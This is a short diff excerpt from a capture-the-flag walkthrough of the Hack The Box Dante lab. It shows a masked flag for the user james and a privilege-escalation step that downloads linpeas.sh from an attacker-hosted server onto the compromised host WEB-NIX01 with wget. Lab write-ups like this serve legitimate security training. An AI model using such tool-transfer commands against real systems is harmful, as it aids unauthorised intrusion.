JosephJ12/CTF-Walkthroughs/HTB Pro Labs - Dante.md

 DANTE{j4m3s_xxxxxxxxxxxxxxxxxxxx!}
 ```

+We login as james successfully and even get a flag!

-15. We will do some basic privesc enumeration by transferring over the `linpeas.sh` script.
+15. Now let's do some basic privesc enumeration by transferring over the `linpeas.sh` script.
 We start a python server on our local machine and use wget to download the script onto WEB-NIX01.

 `wget http://[IP]/linpeas.sh`